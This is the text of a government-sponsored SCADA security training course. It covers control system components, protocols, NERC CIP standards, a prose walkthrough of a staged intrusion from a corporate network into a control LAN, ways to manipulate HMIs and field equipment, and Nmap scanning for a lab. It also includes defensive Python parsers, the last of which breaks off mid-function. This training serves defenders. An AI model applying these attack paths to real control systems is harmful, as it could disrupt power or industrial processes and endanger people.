NSTB
National SCADA Test Bed
enhancing control systems security in the energy sector
Hands-on Control System
Cyber Security Training
Program Sponsor:
Department of Energy
National SCADA Test Bed
NSTB Enhancing Control Systems Security in the Energy Sector
Disclaimer
References made herein to any specific commercial product, process, or service by trade name, trademark, manufacturer, or otherwise, do not necessarily constitute or imply its endorsement, recommendation, or favoring by the U.S. Government or any agency thereof.
The attacks and exploits shown in the demonstration are not specific to any vendor technology.
Use the described security tools and techniques at your own risk, i.e., carefully evaluate any tool prior to using it in a production network.
Why this class?
The Security Mindset
-- Difficult to teach / learn
-- Makes us better defenders
Security requires a particular mindset. Security professionals -- at least the good ones -- see the world differently. They can't walk into a store without noticing how they might shoplift. They can't use a computer without wondering about the security vulnerabilities. They can't vote without trying to figure out how to vote twice. They just can't help it.
This kind of thinking is not natural for most people. It's not natural for engineers. Good engineering involves thinking about how things can be made to work; the security mindset involves thinking about how things can be made to fail. It involves thinking like an attacker, an adversary or a criminal. You don't have to exploit the vulnerabilities you find, but if you don't see the world that way, you'll never notice most security problems.
Given that, is it ethical to research new vulnerabilities?
Unequivocally, yes. Despite the risks, vulnerability research is enormously valuable.
Security is a mindset, and looking for vulnerabilities nurtures that mindset. Deny
practitioners this vital learning tool, and security suffers accordingly.
-- Bruce Schneier, CRYPTO-GRAM, April, May, 2008
Goals
When you are finished with this training, you will:
Understand some key issues in cyber security and how
they relate to control systems
Learn methods that can be used to
Discover and Analyze vulnerabilities in control system environments
Network design
Operating systems
Critical communications paths
Applications
Apply contemporary security mitigation strategies to control systems
Understand the delicate balance between security and business
operations in the control system domain
Agenda
Introduction (you are here)
SCADA & Control Systems Overview
Risk to Control Systems
Exploit Demonstration
NERC Security Requirements
SCADA Security Chalk Talk
Interactive Activity
Loading the Live CD for testing the environment
Toolkit discussion and set-up
Enumerating/Analyzing the networks
Defense, Detection, and Analysis
Interactive Discussion
Breaks will be as required
SCADA & Control Systems
Overview
Control System Basics
[Figure: control system building blocks, from the field to the control center:
FIELD DEVICES: I/O, meters, sensors, field devices
Remote Controller: PLC, IED, RTU
Communication: FEP, protocols, wired, wireless
CONTROL CENTER (Master): SCADA, HMI, EMS, DCS]
SCADA & CS Components
Sensors and Field Devices
RTU - Remote Terminal Unit or Remote Telemetry Unit
IED - Intelligent Electronic Device
PLC - Programmable Logic Controller
FEP / Protocol Pre-processor - Front End Processor
HMI / Operator Console - Human Machine Interface
PCS - Process Control System
DCS - Distributed Control System
SCADA - Supervisory Control and Data Acquisition
EMS - Energy Management System
Sensors and Field Devices (Inputs)
Discrete Sensors
Typically provided by contacts that are either
open or shut to indicate an on or off condition,
or a high or low alarm level
Analog Sensors
Convert continuous parameters such as
temperature or flow to analog signals such as
4-20mA or 0-10V
How Do They Get into the Control System?
To get field information into the control
system, the electric signals must be digitized.
This is done using equipment such as RTUs,
PLCs, IEDs
[Figure: sensor and transmitter]
The RTU
Remote Terminal Units (RTU)
Convert analog and discrete
measurements to digital
information
Contain analog and discrete
inputs
Numerous communications
options and data protocols
Also used for:
Data concentration
Protocol conversion
Also known as
Remote Telemetry Units
The IED
Electro-Mechanical Relays,
Meters, and Controls
Intelligent Electronic Devices
(IED)
Modern microprocessor-based controllers
Built-in I/O
One IED can have
hundreds to thousands of
data points
Built-in Communications
IEDs are frequently
networked using serial or
Ethernet-based
communication protocols,
but this is not required
Other Features
Contain logical expressions
User configurable
Replacement IEDs
communications data map
Event recording with point-on-wave accuracy
Configuration can be done
remotely
The PLC
Programmable logic controllers
(PLCs) were developed as a
replacement for relay-based control
PLCs retain the ladder logic
functionality but today are capable
of higher-level programming
languages such as C++
Some PLCs use the following
programming methods:
Structured text
Function block diagram
Sequential function chart
Instruction list
[Figure: Basic Motor Control Ladder Logic, with L1/L2 rails, STOP and START contacts, motor M, overload (O.L.), and S/R]
PLC Programming Trends
Current Technologies Used in PLCs
Are network enabled
They can be programmed remotely
PLCs are starting to merge with embedded PCs
Onboard I/O servers, web servers, FTP, and SNMP embedded
Universal Programming (IEC 61131-3 )
Most PLCs have very minimal security
The HMI
A human-machine interface (HMI) is used to give a graphical
representation of the controlled environment to the operator.
Used for control, monitoring, and alarming
Can be software systems on a PC or standalone systems like touch
panels, handheld devices, or panel-mounted displays
Used in some cases to collect data from devices (PLCs, IEDs, etc.)
and display or send the data to a database for historical trending
The DCS
The Distributed Control System (DCS) has a centralized control panel
and can consist of a collection of other control systems
Commonly found in oil and gas, chemical, water, and waste water
systems
Built for advanced process control
More on DCS
Physical hardware similar to PLC
Rack and slot convention
Redundant processors on UPS backup power
Built for real-time control
Communications
Proprietary backbone protocols
Communications with other systems primarily for ALARMING
Reliability is #1
Systems availability > 99%
Industrial hardened equipment
SCADA or DCS?
Supervisory Control and Data Acquisition (SCADA) and Distributed
Control Systems (DCS) have historically been different:
The key word in SCADA is Supervisory. This indicates that
decisions are not directly made by the system. Instead, the
system executes control decisions based on control parameters
by operators or management. SCADA systems are typically
deployed across large geographical areas (e.g., the electric grid)
DCS provides real-time monitoring and control of a given process
within a plant. All major components of the system are usually
confined to one or several close-by facilities (e.g., a refinery)
As technology advances, the terms are getting blurry. You will
quite often hear policy makers refer to SCADA when they are
really referring to another type of Industrial Control System.
Support Servers
Support servers are standard servers with an OS that perform specific functions for the control system.
Historical data loggers (Historians)
Databases that are used to store data
Data is used for historical trending on an HMI
or within engineering applications
Application servers (App Servers)
Can be used to serve up HMI screens to
operator (client) PCs
Screen changes only need to be made once
Other servers
SCADA servers / front-end processors
Communication gateways
Real-time database servers
Leased Lines
Use existing switched phone system
Slow connection speeds (56k)
Not isolated from other phone systems
Large cost fluctuations
Sometimes it's the cheaper solution
Sometimes it's very expensive
Primary installations
Legacy systems
When a wireless or IP solution isn't an option
Dedicated Lines
More secure than leased lines
High installation costs
Lower recurring costs
Lines aren't governed by a third party
Primary installations
May be Isolated systems
Serial communications
Power Line Communications
Power Line Carrier
Superimposed analog signal over a 50 or 60 Hz AC system
Used in the electrical sector for command and control
Low data throughput (slow)
Broadband over Power Line
Common Last Mile solution
Regionally installed
Not used in rural settings
Wired Media - Copper / Fiber
Used in both IP Ethernet and serial
applications
Large number of compatible devices
More security options
Ease of installation
Wireless: Radios and WiFi
Radio
Commonly used
Spread spectrum or narrow band
Used in most industries
Low cost and quick installations
Speeds comparable to a 56kb modem
IEEE 802.11 (WiFi)
Extremely common
Inexpensive
Moderate to long range
Household 150m unmodified
Range increased using directional antennas
Various authentication technologies
Various encryption technologies
Wireless: Microwave and Cellular
Microwave
Used frequently in pipeline control systems
and remote electrical substations
Large bandwidth compared to copper
Line of sight limitations
Costly installations
Cellular
Use existing cellular telephone networks
Vendors integrating cellular capabilities
into products like transmitters
Protocols (partial list)
ANSI X3.28
Gedac 7020
BBC 7200
ICCP
CDC Types 1 and 2
Landis & Gyr 8979
Conitel 2020/2000/3000
Modbus
DCP 1
OPC
DNP 3.0
ControlNet
DeviceNet
DH+
ProfiBus
Tejas 3 and 5
TRW 9550
UCA
Many homegrown and proprietary protocols are
available and used in control systems today.
Network Layers
The OSI & the ARPA Layered Architecture
OSI (Theoretical)                 | ARPA (Practical)                          | Role
Application, Presentation, Session | Process / Application Layer               | Handling
Transport                          | Host-to-Host Layer                        | Error Checking
Network                            | Internet Layer                            | Routing
Data Link, Physical                | Network Interface or Local Network Layer  | Delivery
DNP3.0
Distributed Network
Protocol (DNP) 3.0
Designed for SCADA
primarily for electrical
Industry
Supported functions include
SCADA/EMS applications
RTU to IED communications
Master to remote
communications
Emerging open
architecture standard
Also available as DNP
over IP
Master/remote exchange labels: send request, accept response, confirmation, time-outs, error recovery
DNP3 Packet Diagram (figure), by TCP/IP layer:
  Network: Ethernet Header | Ethernet Data
  Internet: IP Header | IP Data
  Transport: TCP/UDP Header | TCP/UDP Data
  Application: DNP3 Header | TH | ASDU + CRCs
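As an added example (not part of the NSTB course material) of the framing the diagram summarises: a DNP3 link frame starts with 0x05 0x64, carries LEN, CTRL, DEST and SRC, and protects the header and each 16-byte block of user data with its own CRC-16/DNP. The sample frame is constructed; the layout and CRC follow the DNP3 link-layer specification. The CRCs give integrity against line noise only and say nothing about who sent the frame, which is the protocol weakness the Risk section returns to.

```python
import struct

START = b"\x05\x64"   # DNP3 link-layer start bytes
BLOCK = 16            # user data travels in 16-byte blocks, each followed by its own CRC


def crc_dnp(data: bytes) -> int:
    """CRC-16/DNP: poly 0x3D65 (0xA6BC reflected), init 0, bit-reflected, final XOR 0xFFFF."""
    crc = 0
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0xA6BC if crc & 1 else crc >> 1
    return (~crc) & 0xFFFF


def build_link_frame(ctrl: int, dest: int, src: int, user_data: bytes) -> bytes:
    """Assemble a frame: header + header CRC, then 16-byte data blocks each with a CRC."""
    # LEN counts CTRL, DEST and SRC (5 bytes) plus the user data, never the CRCs.
    header = START + bytes([5 + len(user_data), ctrl]) + struct.pack("<HH", dest, src)
    frame = header + struct.pack("<H", crc_dnp(header))
    for i in range(0, len(user_data), BLOCK):
        block = user_data[i:i + BLOCK]
        frame += block + struct.pack("<H", crc_dnp(block))
    return frame


def parse_link_frame(frame: bytes) -> dict:
    """Decode a link frame, raising ValueError on bad framing or any CRC mismatch."""
    if len(frame) < 10 or frame[:2] != START:
        raise ValueError("missing 0x0564 start bytes or truncated header")
    header = frame[:8]
    (header_crc,) = struct.unpack("<H", frame[8:10])   # CRCs are sent LSB first
    if crc_dnp(header) != header_crc:
        raise ValueError("header CRC mismatch")
    length, ctrl = header[2], header[3]
    dest, src = struct.unpack("<HH", header[4:8])
    remaining, pos, user_data = length - 5, 10, b""
    while remaining > 0:
        n = min(BLOCK, remaining)
        if len(frame) < pos + n + 2:
            raise ValueError("truncated user data block")
        block = frame[pos:pos + n]
        (block_crc,) = struct.unpack("<H", frame[pos + n:pos + n + 2])
        if crc_dnp(block) != block_crc:
            raise ValueError(f"user data CRC mismatch at offset {pos}")
        user_data += block
        pos += n + 2
        remaining -= n
    return {
        "ctrl": ctrl, "dest": dest, "src": src, "user_data": user_data,
        # DIR bit (0x80) set means the frame came from the master.
        "direction": "master->outstation" if ctrl & 0x80 else "outstation->master",
    }


def frame_is_valid(frame: bytes) -> bool:
    """True when framing and every CRC check out; a single flipped bit makes this False."""
    try:
        parse_link_frame(frame)
        return True
    except ValueError:
        return False


# Constructed sample: master (address 1024) to outstation 1, CTRL 0xC4 = DIR|PRM, 20 data bytes.
SAMPLE_FRAME = build_link_frame(0xC4, dest=1, src=1024, user_data=bytes(range(20)))

if __name__ == "__main__":
    print(parse_link_frame(SAMPLE_FRAME))
    noisy = bytearray(SAMPLE_FRAME)
    noisy[12] ^= 0x01            # one bit of user data flipped: the block CRC now fails
    print("valid after bit flip:", frame_is_valid(bytes(noisy)))
```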
OPC
Object Linking and Embedding (OLE) for
Process Control (OPC)
Original standard developed in 1996
Based on OLE, COM and DCOM from
Microsoft
Client / server orientation
Provides easy-to-use communication
architecture for remote Windows computers
and applications to work together
OPC-DA, OPC-DX, OPC-A&E, OPC-HDA
OPC Packet Diagram (figure), by TCP/IP layer:
  Network: Ethernet Header | Ethernet Data
  Internet: IP Header | IP Data
  Transport: TCP/UDP Header | TCP/UDP Data
  RPC / DCOM (ORPC) / OPC: RPC Header | RPC/DCOM/OPC Data
ICCP
Inter-Control Center Protocol (ICCP)
Also known as IEC 60870-6 or TASE.2
Used within the electrical sector between control centers
Data source is mapped at the client and server
Secure version of ICCP incorporates digital certificate
authentication and encryption
Some process control networks are incorporating ICCP
into their systems
ICCP Packet Diagram (figure), by TCP/IP layer:
  Network: Ethernet Header | Ethernet Data
  Internet: IP Header | IP Data
  Transport: TCP Header | TCP Data
  TPKT / COTP (OSI transport carried over TCP)
  Session: SPDU
  Presentation: PPDU
  ACSE / MMS: MMS PDU
  TASE.2 (ICCP)
Modbus
Modbus ASCII
  Serial RS-232 or RS-485
Modbus RTU (Most common)
  Serial RS-232 or RS-485
Modbus Plus (Modbus+, MB+)
  Proprietary to Modicon
  Twisted pair up to 1 Mb/s
  Uses token rotation
Modbus TCP
  Transported within TCP/IP data packets
  Uses Port 502
Modbus TCP Packet Diagram (figure), by TCP/IP layer:
  Network: Ethernet Header | Ethernet Data
  Internet: IP Header | IP Data
  Transport: TCP Header | TCP Data
  Modbus TCP: MBAP Header | Function Code | Data
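An added example (not from the NSTB material) that parses the Modbus TCP layout shown above, an MBAP header followed by function code and data on port 502, and uses it the way a network monitor on the control LAN would: flag write function codes arriving from any host other than the HMI, and flag frames that do not parse. The host names, IP addresses and sample traffic are constructed; the MBAP framing and public function codes are standard Modbus.

```python
import struct
from dataclasses import dataclass

MODBUS_TCP_PORT = 502
MBAP_LEN = 7   # transaction id (2) + protocol id (2) + length (2) + unit id (1)

# Public function codes split the way a monitor cares about: reads vs. writes.
READ_FUNCTIONS = {1: "Read Coils", 2: "Read Discrete Inputs",
                  3: "Read Holding Registers", 4: "Read Input Registers"}
WRITE_FUNCTIONS = {5: "Write Single Coil", 6: "Write Single Register",
                   15: "Write Multiple Coils", 16: "Write Multiple Registers"}


@dataclass
class ModbusFrame:
    transaction_id: int
    unit_id: int
    function_code: int
    data: bytes

    @property
    def is_exception(self) -> bool:
        return bool(self.function_code & 0x80)   # responses set bit 7 to report an error

    @property
    def is_write(self) -> bool:
        return (self.function_code & 0x7F) in WRITE_FUNCTIONS


def build_modbus_tcp(tid: int, unit_id: int, function_code: int, data: bytes) -> bytes:
    """Assemble MBAP header + PDU (used here only to construct sample traffic)."""
    pdu = bytes([function_code]) + data
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit_id) + pdu


def parse_modbus_tcp(payload: bytes) -> ModbusFrame:
    """Parse one Modbus TCP frame from a TCP payload; raise ValueError if malformed."""
    if len(payload) < MBAP_LEN + 1:
        raise ValueError("shorter than MBAP header plus function code")
    tid, proto, length, unit_id = struct.unpack(">HHHB", payload[:MBAP_LEN])
    if proto != 0:
        raise ValueError(f"protocol id {proto} is not Modbus (must be 0)")
    # The length field covers unit id + function code + data, i.e. everything after byte 6.
    if length != len(payload) - 6:
        raise ValueError(f"length field {length} disagrees with payload ({len(payload) - 6})")
    return ModbusFrame(tid, unit_id, payload[MBAP_LEN], payload[MBAP_LEN + 1:])


def audit_control_traffic(records, write_allowed):
    """Return alert strings for writes from hosts outside write_allowed and for malformed frames."""
    alerts = []
    for src_ip, dst_port, payload in records:
        if dst_port != MODBUS_TCP_PORT:
            continue
        try:
            frame = parse_modbus_tcp(payload)
        except ValueError as err:
            alerts.append(f"{src_ip}: malformed Modbus frame ({err})")
            continue
        if frame.is_write and src_ip not in write_allowed:
            name = WRITE_FUNCTIONS[frame.function_code & 0x7F]
            alerts.append(f"{src_ip}: {name} to unit {frame.unit_id} from a host not allowed to write")
    return alerts


# Constructed sample: (source IP, destination port, TCP payload). 192.168.1.10 stands in for
# the HMI; 192.168.1.150 is an unexpected host from the class's control-network DHCP range.
HMI = "192.168.1.10"
SAMPLE_RECORDS = [
    (HMI, 502, build_modbus_tcp(1, 1, 3, b"\x00\x00\x00\x0a")),               # HMI polls 10 holding registers
    (HMI, 502, build_modbus_tcp(2, 1, 5, b"\x00\x11\xff\x00")),               # HMI sets coil 17 ON
    ("192.168.1.150", 502, build_modbus_tcp(3, 1, 5, b"\x00\x11\x00\x00")),   # unknown host clears coil 17
    ("192.168.1.150", 502, b"\x00\x04\x00\x01\x00\x06\x01\x03\x00\x00\x00\x0a"),  # protocol id 1: malformed
    ("192.168.1.150", 80, b"GET / HTTP/1.0\r\n\r\n"),                         # not Modbus, ignored
]

if __name__ == "__main__":
    for alert in audit_control_traffic(SAMPLE_RECORDS, write_allowed={HMI}):
        print(alert)
```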
Review
Welcome to another bowl of acronym soup
SCADA and DCS systems are large (geographically) and
complex
There are many unique devices (embedded) connected
to these networks
Communications travel over a variety of physical media
and utilize many different protocols
Reliability and Availability are number one
Risk and Control Systems
Risk is Elevated in Converged &
Interconnected Systems
Technology has blurred the line between the physical
machine and the electronic machine driving our infrastructure.
Threat Trends
Threats More Complex as Attackers Proliferate
[Figure: attack sophistication (Low to High) against intruder knowledge, 1980-2010. Techniques plotted include password guessing, self-replicating code, password cracking, exploiting known vulnerabilities, disabling audits, back doors, hijacking sessions, sniffers, packet spoofing, sweepers, GUI tools, automated probes/scans, network management diagnostics, WWW attacks, denial of service, distributed attack tools, stealth/advanced scanning techniques, zombies, BOTS and morphing malicious code. The chart contrasts the "Era of Legacy Control System Technology" with the "Era of Modern Information Technology" and marks a "Zone of Defense" against control system attackers.]
Lipson, H. F., Tracking and Tracing Cyber-Attacks: Technical Challenges and Global Policy Issues, Special Report CMS/SEI-2002-SR-009, November 2002, page 10.
Looking at the Zone
Vulnerabilities especially
applicable to Control Systems
Problem exacerbated by lack of
authentication, authorization,
plain text traffic
Cyber Threats: The Flattening of the Line
[Figure: likelihood (Very to Less) plotted against consequences (Smallest to Largest: probe, system compromise, system control). Three attacker groups: GRP I, mainstream hackers; GRP II, organized crime, competitors, hackers for hire and activists; GRP III, nation states and terrorists. Attack tiers from most to least likely: general, less-structured cyber attacks (notoriety and fame, worms, "just to do it", the hacking economy, DOS); directed cyber attacks by structured hackers (direct and targeted monetary gain, extreme activist groups, disgruntled employees, disruption, directed corruption, concentrated DDOS); and strategic information warfare (major economic gain, cyber terrorism, asymmetric warfare, poisoned data, loss of confidence, sophisticated injection).]
Protocol Vulnerabilities: Expediting Attack Success
No authentication amongst isolated
components
Modbus/ICCP/DNP3 fully published and
open for review
OLE for Process Control (OPC)
US-CERT Posted Vulnerabilities
Davis Besse SQL Slammer
Harrisburg, PA water facility
Insider Threat
2 deny hacking into L.A.'s traffic
light system
Two accused of hacking into L.A.'s traffic light system plead not guilty. They
allegedly chose intersections they knew would cause major jams.
By Sharon Bernstein and Andrew Blankstein, Times Staff Writers - January 9, 2007
Back in August, the union representing the city's traffic engineers
vowed that on the day of their work action, "Los Angeles is not going
to be a fun place to drive."
City officials took the threat seriously.
Fearful that the strikers could wreak havoc on the surface street
system, they temporarily blocked all engineers from access to the
computer that controls traffic signals.
But officials now allege that two engineers, Kartik Patel and Gabriel Murillo, figured out how to hack in anyway. With a few clicks on a laptop computer, the pair -- one a renowned traffic engineer profiled in the national media, the other a computer whiz who helped build the system -- allegedly tied up traffic at four intersections for several days.
Los Angeles Times
Identify Vulnerable Components
Network comm.
Operating systems
Applications
Identify Threat Vectors
Advisories
Exploit code
Advanced tools
Identify Mitigations
Network comm.
Operating systems
Applications
Exposure
System Exposure (figure):
  Components: Network comm., Operating systems, Applications
  Vulnerabilities: Advisories, Exploit code, Advanced tools
  Mitigation: Block, Detect, Workaround, Fix
  GAP (the exposure the mitigations do not cover)
Review
SCADA systems are typically 10-15 years behind the security curve
There are many different types of threats more than
what typical IT systems must worry about
Our goal in securing these systems is to reduce our overall vulnerability exposure
SCADA Exploit Demonstration
Demo Network Layout
Demo Exploit Path
Attack Stage #1 Internet to Corporate
Client Side Attack:
Corporate user follows a malicious URL
Social engineering
From an email
From a suspicious web page
Triggers a vulnerability on the corp box
Exploit payload calls outbound
through the firewall to the attacker
internet host
Attacker gains remote control of the
corporate victim
Attack Stage #2 Reconnaissance
Victim #1 browser history indicates access to a separate subnet
(Victim #1 IP 192.168.2.32, HTTP IP - 192.168.3.21)
Attack Stage #2 Corporate to DMZ
Web Application Vulnerabilities
Help desk web application allows user to upload arbitrary files (trouble tickets)
Attacker uploads a new PHP file and also an executable rootkit
Website code has an SQL injection problem
Provides admin access to the website (privileged features)
Attacker makes an HTTP request to an existing admin page and changes the action on the
URL to include (aka execute) the uploaded PHP page
PHP is able to run system commands and launch the rootkit
Firewall policy:
Grants Victim #1 HTTP access to Victim #2
Victim #2 allowed any TCP connection to internet
Uploaded rootkit calls back to attacker machine
Attack Stage #3 Reconnaissance
Victim #2 netstat shows an established connection to a new subnet
(Victim #2 IP 192.168.10.21, Remote Server IP 192.168.0.97)
Attack Stage #3 DMZ to SCADA
Tag Server Buffer Overflow
Exploit overflows the point name field
Firewall policy:
Grants Victim #2 access to Victim #3 on port 2000
Victim #3 allowed any TCP connection to internet
Exploit payload calls back to attacker machine
Attack Stage #3 Pretty Pictures (HMI)
Attack: Send Commands to RTU/PLC
(Trip Breakers)
Attacker incrementally expanded attack
Gained remote control of host inside the control LAN
Controls the HMI or Substation from the internet
Demo Exploit Path (Reminder)
Demo System Vulnerabilities
Antiquated and/or unpatched
Operating systems
Services
Poorly defined firewall policy
Intrusion Detection System (IDS) is underutilized
Application coding problems
Unsafe function usage
Logic problems
Least Privilege principle has not been applied to all applications, services, and the network design
NERC
Security Requirements
The CIP Standards: The Condensed Version
CIP-002-1 Cyber Security - Critical Cyber Asset Identification:
Requires a responsible entity to identify its critical assets and critical cyber
assets using a risk-based assessment methodology.
R1 Critical Asset Identification Method
R2 Critical Asset Identification
R3 Critical Cyber Asset Identification
R4 Annual Approval
CIP-003-1 Cyber Security - Security Management Controls:
Requires a responsible entity to develop and implement security management controls to protect critical assets identified pursuant to CIP-002-1.
R1 Cyber Security Policy (NERC Top 10)
R2 Leadership
R3 Exceptions
R4 Information Protection
R5 Access Control
R6 Change Control and Configuration Management
The CIP Standards: The Condensed Version
CIP-004-1 Cyber Security - Personnel and Training:
Requires personnel with access to critical cyber assets to have identity
verification and a criminal check. It also requires employee training.
R1 Awareness
R2 Training
R3 Personnel Risk Assessment
R4 Access
CIP-005-1 Cyber Security - Electronic Security Perimeters:
Requires the identification and protection of an electronic security perimeter and access points. The electronic security perimeter is to encompass the critical cyber assets identified pursuant to the methodology required by CIP-002-1.
R1 Electronic Security Perimeter
R2 Electronic Access Control
R3 Monitoring Electronic Access
R4 Cyber Vulnerability Assessment
R5 Documentation Review
The CIP Standards: The Condensed Version
CIP-006-1 Cyber Security - Physical Security of Critical Cyber Assets:
Requires a responsible entity to create and maintain a physical security
plan that ensures that all cyber assets within an electronic security
perimeter are kept in an identified physical security perimeter.
R1 Physical security Plan
R2 Physical Access Controls
R3 Monitoring Physical Access
R4 Logging Physical Access
R5 Access Log Retention
R6 Maintenance and Testing
The CIP Standards: The Condensed Version
CIP-007-1 Cyber Security - Systems Security Management:
Requires a responsible entity to define methods, processes and procedures
for securing the systems identified as critical cyber assets, as well as the
non-critical cyber assets within an electronic security perimeter.
R1 Test Procedures
R2 Ports and Services
R3 Security Patch Management
R4 Malicious Software Prevention
R5 Account Management
R6 Security Status Monitoring
R7 Disposal or Redeployment
R8 Cyber Vulnerability Assessment
R9 Documentation Review and Maintenance
The CIP Standards: The Condensed Version
CIP-008-1 Cyber Security - Incident Reporting and Response Planning:
Requires a responsible entity to identify, classify, respond to, and report
cyber security incidents related to critical cyber assets.
R1 Cyber Security Incident Response Plan
R2 Cyber Security Incident Documentation
CIP-009-1 Cyber Security - Recovery Plans for Critical Cyber Assets:
Requires the establishment of recovery plans for critical cyber assets using
established business continuity and disaster recovery techniques and
practices.
R1 Recovery Plans
R2 Exercises
R3 Change Control
R4 Backup and Restore
R5 Testing Backup Media
Security is a Never Ending Process
[Figure: security life-cycle wheel showing the CIP requirements that apply at each step: CIP-002 R1, R2; CIP-002 R2, R3; CIP-002 R3, M3; CIP-005 R1; CIP-004-1 R2; CIP-003; CIP-006; CIP-007; CIP-005 R4; CIP-007 R8; CIP-008; CIP-009]
NERC Top 10 Vulnerabilities - 2007
Introduction
The U.S. Department of Energy National SCADA Test Bed (NSTB) program has provided initial recommended mitigation strategies for the list of vulnerabilities prepared by the CSSWG members.
Three levels of mitigation strategies are proposed: foundational, intermediate, and advanced. Foundational strategies are considered to be minimal mitigation strategies, typically involving the establishment of security policy and fundamental implementations. Intermediate strategies are a next step in establishing a secure posture and involve readily available technologies or the stronger implementation of baseline policies. Advanced mitigation strategies provide long-term achievable security posture guidance but may include tools or technologies that are currently not readily available.
NERC Top 10 Vulnerabilities - 2007
1. Inadequate Policies, Procedures, and Culture Governing Control System Security
2. Inadequately designed control system networks that lack sufficient defense-in-depth mechanisms
3. Remote access to the control system without appropriate access control
4. System administration mechanisms and software used in control systems are not adequately scrutinized or maintained.
5. Use of inadequately secured wireless communication for control
6. Use of a non-dedicated communications channel for command and control and/or inappropriate use of control system network bandwidth for non-control purposes
7. Insufficient application of tools to detect and report on anomalous or inappropriate activity
8. Unauthorized or inappropriate applications or devices on control system networks
9. Control systems command and control data not authenticated
10. Inadequately managed, designed, or implemented critical support infrastructure
SCADA
Security Chalk Talk
Electronic Perimeter
[Figure: electronic perimeter. The World / Internet Provider on the outside, the Corporate Firewall at the boundary, and the Corporate Network split into an IT side and a non-IT side.]
Attack Vectors: Communications Lines
Attack Vectors: Remote Comms / Modems
Attack Vectors: Vendor Access
Attack Vectors: Database Connections
Considerations
Knowledge of the process is key for long term
or surgical disruption
Field equipment generally doesn't contain
process knowledge
Breaker 17A
Valve 4
Direct access to field equipment without
additional knowledge generally only results
in nuisance disruption
Manipulation of the System
Talk Directly to the Front-End Equipment
Often no userid/passwords required
Undocumented vendor protocols are common
Commands are generally not logged
Manipulation of the System
Export the HMI Screen
Graphic pictures to describe the process
Noticeable by the operator
Can use your off-the-shelf tools
Have credentials of logged in user
May not be able to manipulate to failure
Manipulation of the System
Peer Utility
ICCP
Often the least secured link
Necessary for operation in electric power
Peers often have limited rights on the peer's system
Manipulation of the System
Changing Data in the Database
(Diagram: FEP, Database, HMI)
Operator may make decisions based on bad data
Not all vendor systems vulnerable
Manipulation of the System
Insert Commands in the Application Stream
(Diagram: FEP, HMI)
Must understand vendor (or other) protocols
Logged as actions by the operator
Generally can bypass failure logic
May or may not need credentials
Manipulation of the System
Change Operator's Display
(Diagram: FEP, HMI)
If presented with an out-of-control system, operator will
take steps to shut down
Logs will reflect operator actions & true state of system
Detailed knowledge of process needed to make
believable
Observations from the Field
"We have no outside communications... except for that one... and that one... and that one."
"Hackers don't understand process control."
"Patches have historically broken process control systems."
"Fear of regulation is greater than fear of attack."
"It's only one-way traffic; my vendor says he only writes to the database."
Review
The additional integration of the business IT environment
increases our system exposure
These complex systems have many potential points of
entry
Intelligently understanding SCADA is not trivial
Causing general havoc is easy
There are many core systems that need to be monitored
for malicious activity
Network Security
Identification &
Remediation
(Interactive Module)
*Please be aware of sensitive personal data on your PC; this is a shared network.
If you want to fully protect your data, you may want to remove your drive at this time.
Interactive Guidelines
The interactive session will cover both scanning
and network analysis activities
You will be assessing Corporate, DMZ, and
Control networks
You will be provided an IP address for each
network
Corporate 192.168.2.0/24 DHCP 192.168.2.100-200
DMZ 192.168.3.0/24 DHCP 192.168.3.100-200
Control 192.168.1.0/24 DHCP 192.168.1.100-200
Interactive Guidelines
You will be provided a customized Knoppix CD (with
tools) to boot your computer from
You will be using the Knoppix CD for most of the hands-on work
You also have the option to use your own tools
Demo Network Layout
Group I
Group II
Group III
We'll rotate networks during the course of the day
Starting
1. Insert Knoppix CD
2. Turn off / Shutdown (remove your HDD if desired)
3. Reboot and set your computer to boot from CD (F12)
4. Start your computer
5. Open a root console: Kmenu > Root shell
-- Reference the documentation provided at startup --
Remember, the Linux man command is your friend!
NSTB Enhancing Control Systems Security in the Energy Sector
Starting
If your computer successfully boots, you will be brought to this screen
Starting
[Screenshot: desktop icons for a Root User Shell and a Knoppix User Shell]
Most of our exercises will be run from a Linux shell
Basic Linux Shell Commands
Some of the common commands:
man <cmd> - Open the manual page for a command
<cmd> --help - Often invokes simple help instructions for a command
ls - List directory contents (same as dir)
pwd - Print the current working directory
rm - Remove a file (same as del)
mv <src> <dst> - Move a file
cp <src> <dst> - Copy a file
cd - Change to a new directory
more <file> - Prints contents of a file to the shell
less <file> - Same as more, but different
cat <file> - Same as more or less, but different
nano <file> - Opens the file in a simple text editor
ifconfig - Displays network adapter information (IP, MAC, etc)
pump - DHCP client application (e.g. pump -i eth0)
To execute programs in a local directory (e.g. metasploit) use ./
./msfconsole
Tab completion is your friend. We'll show you how!
Enumerate Network
Nmap is designed to allow system administrators
& curious individuals to scan large networks to
determine which hosts are up & what services they are
offering.
A Fast & Informative Network Scanner that
CAN Be Safely Used on isolated non-production
SCADA/Control System Networks. *
This tool can be DANGEROUS to your system, use with caution!
Nmap Network Exploration
Nmap was originally designed to be run from the command line (i.e., a Bash or DOS prompt)
Some common Nmap options:
-sS  TCP SYN Stealth Scanning (Default for root)
-sF  TCP FIN Stealth Scanning
-sX  Nmap Christmas Tree Scan (All TCP Flags Set)
-sN  Null Stealth Scanning (No TCP Flags Set)
-sP  Ping Sweep
-sV  Enable Version Probing
-O   OS Detection
-Tx  Timing Mode (Polite & Sneaky)
-oN <file>  Save the results to a normal text file
-n   Do not resolve IP addresses (DNS)
Nmap Network Exploration
Target hosts can be specified in many ways:
192.168.2.1-254  All 255 possible IP addresses on this subnet
192.168.2.0/24  Equivalent to the above but signifying a class C address block
192.168.1-4.1-254  Ranges are allowed for subnets as well
192.168.0.0/16  The 16-bit netmask will scan the entire class B address block
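As an added example (not from the course CD and not Nmap's own code), the following Python expands each of the target forms above into the addresses it covers, so the scope of a scan can be counted before it is run on a control network; the function names expand_targets and count_targets are chosen here.

```python
"""Expand Nmap-style target specifications (added example, not course material).
Covers the forms on the slide: one octet range (192.168.2.1-254), ranges in
several octets (192.168.1-4.1-254) and CIDR blocks (192.168.2.0/24,
192.168.0.0/16). Counting targets first matters on a control network:
a /16 is 65,536 addresses, every one of which will be probed."""
import ipaddress
import itertools
from typing import Iterator, List


def _octet_values(part: str) -> List[int]:
    """'5' -> [5]; '1-4' -> [1, 2, 3, 4]; '1,5' -> [1, 5] (Nmap also allows commas)."""
    values = []
    for piece in part.split(","):
        lo, _, hi = piece.partition("-")
        lo_i = int(lo)
        hi_i = int(hi) if hi else lo_i
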